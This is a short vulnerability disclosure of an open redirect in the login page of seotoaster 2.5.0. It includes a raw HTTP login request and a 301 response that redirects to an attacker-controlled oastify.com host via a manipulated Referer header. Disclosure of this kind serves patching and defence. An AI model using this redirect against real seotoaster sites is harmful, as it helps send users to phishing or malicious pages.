# Exploit Title: Open Redirect "Login Page" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Open Redirect "Login Page" Functionality #1: Steps to Reproduce Login to the application and then add the Referer header to attacker domain // HTTP POST Request POST /seotoaster/go HTTP/1.1 Host: 192.168.58.149 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 [...] email=admin%40example.com &password=Pasw0rd%21&submit=Let+me+in&secureToken=f3a4d32c75942f7f284ae9189e21d431 // HTTP Response HTTP/1.1 301 Moved Permanently Date: Sun, 20 Jul 2025 13:55:07 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://lzoujc24ovcp1k9ky066bcmas1ysmuaj.oastify.com [...]